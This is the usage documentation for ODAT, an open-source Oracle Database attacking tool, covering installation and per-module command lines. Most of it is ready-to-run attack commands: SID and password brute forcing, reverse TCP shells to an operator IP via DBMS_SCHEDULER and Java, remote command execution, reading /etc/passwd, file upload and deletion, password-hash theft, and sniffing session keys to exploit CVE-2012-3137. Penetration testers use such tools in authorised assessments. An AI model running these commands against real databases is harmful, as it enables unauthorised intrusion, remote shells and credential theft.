ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that test the security of Oracle Databases remotely.

Usage examples of ODAT:

• You have an Oracle database listening remotely and want to find valid SIDs and credentials in order to connect to the database
• You have a valid Oracle account on a database and want to escalate your privileges (ex: SYSDBA)
• You have a valid Oracle account and want to execute commands on the operating system hosting this DB (ex: reverse shell)

Version 1.0 (2014/06/26)

Tested on Oracle Database 10g and 11g.

No tested on 9g or 12c yet.

Thanks to ODAT, you can:

• search valid SID on a remote Oracle Database listener via:
• a dictionary attack
• a brute force attack
• ALIAS of the listener
• search Oracle accounts using:
• a dictionary attack
• each Oracle user like the password (need an account before to use this attack)
• execute system commands on the database server using:
• DBMS_SCHEDULER
• JAVA
• external tables
• oradbg
• download files stored on the database server using:
• UTL_FILE
• external tables
• CTXSYS
• upload files on the database server using:
• UTL_FILE
• DBMS_XSLPROCESSOR
• DBMS_ADVISOR
• delete files using:
• UTL_FILE
• send/reveive HTTP requests from the database server using:
• UTL_HTTP
• HttpUriType
• scan ports of the local server or a remote server using:
• UTL_HTTP
• HttpUriType
• UTL_TCP
• exploit the CVE-2012-313 (http://cvedetails.com/cve/2012-3137)
• pickup the session key and salt for arbitrary users
• attack by dictionary on sessions

ODAT is compatible with Linux only.

A standalone version exists in order to don't have need to install dependencies and slqplus (see the build folder of the git). The ODAT standalone has been generated thanks to pyinstaller.

If you want to have the development version installed on your computer, these following tool and dependencies are needed:

• Langage: Python 2.7
• Oracle dependancies:
• Instant Oracle basic
• Instant Oracle sdk
• Python libraries:
• cx_Oracle
• colorlog (recommended)
• termcolor (recommended)
• argcomplete (recommended)
• pyinstaller (recommended)

This part describes how to install instantclient, CX_Oracle and some others python libraries on Ubuntu in order to have the ODAT development version. Don't forget that an ODAT standalone version exists in build: It is not required to install something for use the standalone version :)

• Get instant client basic, sdk (devel) and sqlplus from the Oracle web site:

• X64: http://www.oracle.com/technetwork/topics/linuxx86-64soft-092277.html

• X86: http://www.oracle.com/technetwork/topics/linuxsoft-082809.html

• Install python-dev, alien and libaio1 package (for sqlplus):

sudo apt-get install libaio1 python-dev alien python-pip

• Generate DEB files from RPM files thanks to :

sudo alien --to-deb oracle-instantclient11.2-basic-???.x???.rpm
sudo alien --to-deb oracle-instantclient11.2-sqlplus-???.x???.rpm
sudo alien --to-deb oracle-instantclient11.2-devel-???.x???.rpm

• Install instant client basic, sdk and sqlplus:

sudo dpkg -i oracle-instantclient11.2-basic-???.x???.deb
sudo dpkg -i oracle-instantclient11.2-sqlplus-???.x???.deb
sudo dpkg -i oracle-instantclient11.2-devel_???_???.deb

• Put these lines in your /etc/profile file in order to define Oracle env variables:

export ORACLE_HOME=/usr/lib/oracle/11.2/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=$ORACLE_HOME/bin:$PATH
source /etc/profile

• Restart your session (to apply env variables) and run sqlplus:

sqlplus

If nor error: good job, Continue...

• Create a symlink to your so file.

cd $ORACLE_HOME/lib/
sudo ln -s libclntsh.so.11.1   libclntsh.so

• Create the /etc/ld.so.conf.d/oracle.conf file and add the path to Oracle home:

/usr/lib/oracle/11.2/client64/lib/

• Update the ldpath using:

sudo ldconfig

• Install CX_Oracle

sudo -s
source /etc/profile
pip install cx_Oracle

• Test if all is good:

python -c 'import cx_Oracle' 

This command should just return without errors.

• Install some python libraries:

sudo apt-get install python-scapy
sudo pip install colorlog termcolor pycrypto
sudo pip install argcomplete && sudo activate-global-python-argcomplete

• Install the development version of pyinstaller (http://www.pyinstaller.org/).

python setup.py install

• Run ODAT:

./odat.py -h

Good job if you have not errors:)

• You can list all modules:

./odat.py -h

• When you have chosen a module (example: all), you can use it and you can list all features and options of the module:

./odat.py all -h

The all module allows you to run all modules (depends on options that you have purchased).

It is useful when you want to known what you can do on a database server (with a valid SID or no, with a valid Oracle account or no).

• run all ODAT modules on the 192.168.142.73 Oracle database server listening on the 1521 port:

./odat.py all -s 192.168.142.73 -p 1521

ODAT will search valid SID. It will search valid Oracle accounts on each Oracle Instance (SID) found. For each valid account on each valid instance (SID), it will give you what each user can do (execute system commands on the database server, read files, etc).

• If you known a SID (ex: ORCL):

./odat.py all -s 192.168.142.73 -p 1521 -d ORCL

• If you don't known a SID, you will can give the number of character maximum and the charset to use (for the brute force attack) and the file containing SID (for the dictionary attack):

./odat.py all -s 192.168.142.73 -p 1521 --sids-max-size=3 --sid-charset='abc' --accounts-file=accounts.txt

• If you known a SID (ex: ORCL) and an account (SYS/password):

./odat.py all -s 192.168.142.73 -p 1521 -d ORCL -U SYS -P password

This module search valid SID only.

• You can give the file name containing a SID list:

./odat.py passwordguesser -s $SERVER -d $SID --accounts-file=./accounts_small.txt 

This module has been created in order to try to guess Oracle users passwords.

• This command will try to connect to the database using the Oracle username like the password (only) in order to don't block accounts with too many bad attempts:

./odat.py passwordguesser -s $SERVER -d $SID

• If you want to try each Oracle username with multiple passwords:

./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt

This module can be used to execute system commands on a remote database server. Useful to get a reverse tcp shell.

Note 1: It is not possible to:

~ get the output of the system command

~ to give some special chararacters in arguments to the system command (ex: >)

• To get a reverse tcp shell when the remote database server is a Linux:

./odat.py dbmsscheduler -s $SERVER -d $SID -U $USER -P $PASSWORD --reverse-shell $MY_IP $A_LOCAL_PORT

Note 2: You don't need to open a listen port manually to have a reverse tcp shell: The module will open the specified port for you.

I think it is the most useful and most effective module: Many times I have meet Oracle users who can use the Oracle DBMS_SCHEDULER library but not the JAVA.

This module can be used to execute system commands on a remote database server. Useful to get a shell or a reverse tcp shell.

• To get a shell on the database server:

./odat.py java -s $SERVER -d $SID -U $USER -P $PASSWORD --shell

• To get a reverse tcp shell:

./odat.py java -s $SERVER -d $SID -U $USER -P $PASSWORD --reverse-shell

This module can be used to execute system commands on a remote database server:

• To execute the /bin/ls command:

./odat.py oradbg -s $SERVER -d $SID -U $USER -P $PASSWORD --exec /bin/ls

This module allows you to forge HTTP requests. You can sendand receive HTTP request from the database server. It can be used to scan ports of a remote server. It is useful to knwon which localhost ports are listening for example.

• The --test-module option exists on each module and it permits to known if the current Oracle user is allowed to use the module:

./odat.py utlhttp -s $SERVER -d $SID -U $USER -P $PASSWORD --test-module

• You can scan some ports:

./odat.py utlhttp -s $SERVER -d $SID -U $USER -P $PASSWORD --scan-ports 127.0.0.1 1521,443,22
./odat.py utlhttp -s $SERVER -d $SID -U $USER -P $PASSWORD --scan-ports 127.0.0.1 20-30

• You can send a HTTP request:

echo 'GET / HTTP/1.0\n' > ./temp.txt;
./odat.py utlhttp -s $SERVER -d $SID -U $USER -P $PASSWORD --send google.com 80 temp.txt ;
rm ./temp.txt

This module can be used to scan ports and to forge some HTTP requests:

• To scan ports:

/odat.py httpuritype -s $SERVER -d $SID -U $USER -P $PASSWORD --scan-ports 127.0.0.1 1521,443,22
./odat.py httpuritype -s $SERVER -d $SID -U $USER -P $PASSWORD --scan-ports 127.0.0.1 20-30

• You can send a GET request:

./odat.py httpuritype -s $SERVER -d $SID -U $USER -P $PASSWORD --url 127.0.0.1:80

This module can be used to scan ports and it can be used to forge and to send TCP packet (ex: HTTP request).

• To scan ports:

./odat.py utltcp -s $SERVER -d $SID -U $USER -P $PASSWORD --scan-ports 127.0.0.1 1521,443,22

• To forge a HTTP GET request:

echo 'GET / HTTP/1.0\n\n' > ./temp.txt;
./odat.py utltcp -s $SERVER -d $SID -U $USER -P $PASSWORD --send-packet 127.0.0.1 80 ./temp.txt
rm ./temp.txt

This module can be used to download a file stored on the database server:

• To get the /etc/passwd file of the remote database server:

./odat.py ctxsys -s $SERVER -d $SID -U $USER -P $PASSWORD --getFile /etc/passwd

This module can be used to download files or to run script remotly.

Notes:

~ It is not possible to give an argument to the executable

~ The executable must be stored on the database server

~ The executable must have the execution bit enabled

• To download the temp.sh file stored in /tmp/ in test.txt:

./odat.py externaltable -s $SERVER -d $SID -U $USER -P $PASSWORD --getFile /tmp/ temp.sh test.txt

• To run the temp.sh executable stored in the /tmp/ folder of the database server:

./odat.py externaltable -s $SERVER -d $SID -U $USER -P $PASSWORD --exec /tmp/ temp.sh

This module can be used to upload a file on a remote database server:

• To upload the test.txt local file in the /tmp/ folder like file.txt:

./odat.py dbmsxslprocessor -s $SERVER -d $SID -U $USER -P $PASSWORD --putFile /tmp/ file.txt test.txt

This module can be used to upload a file on the server.

• To upload the test.txt local file in the /tmp/ folder like file.txt:

./odat.py dbmsadvisor -s $SERVER -d $SID -U $USER -P $PASSWORD --putFile /tmp/ file.txt ./test.txt

This module can be used to:

~ upload a file

~ download a file

~ delete a remote file

• To download the /etc/passwd file:

./odat.py utlfile -s $SERVER -d $SID -U $USER -P $PASSWORD --test-module --getFile /etc/ passwd passwd.txt

• To upload the test.txt file:

./odat.py utlfile -s $SERVER -d $SID -U $USER -P $PASSWORD --putFile /tmp/ file.txt test.txt

• To delete the file.txt file stored in /tmp/:

./odat.py utlfile -s $SERVER -d $SID -U $USER -P $PASSWORD --removeFile /tmp/ file.txt

This module has been created in order to get hashed password quicly and to pickup hashed passwords from the history.

• To get hashed passwords from the history:

./odat.py passwordstealer -s $SERVER -d $SID -U $USER -P $PASSWORD --get-passwords-from-history

• To get hashed passwords from the users table:

./odat.py passwordstealer -s $SERVER -d $SID -U $USER -P $PASSWORD --get-passwords

This module allows you to exploit the CVE-2012-3137 (http://www.cvedetails.com/cve/CVE-2012-3137/) vulnerability easily.

Note: Need root privileges in order to sniff session keys and salts from the network.

• To get session keys and salts of users stored in the accounts_small.txt file:

sudo ./odat.py stealRemotePwds -s $SERVER -d $ID --user-list accounts_small.txt --get-all-passwords

• To do a dictionary attack on session keys and salts:

sudo chmod o+r sessions-$SERVER-1521-$SID.txt; ./odat.py stealRemotePwds -s $SERVER -d $SID --decrypt-sessions sessions-$SERVER-1521-$SID.txt dede.txt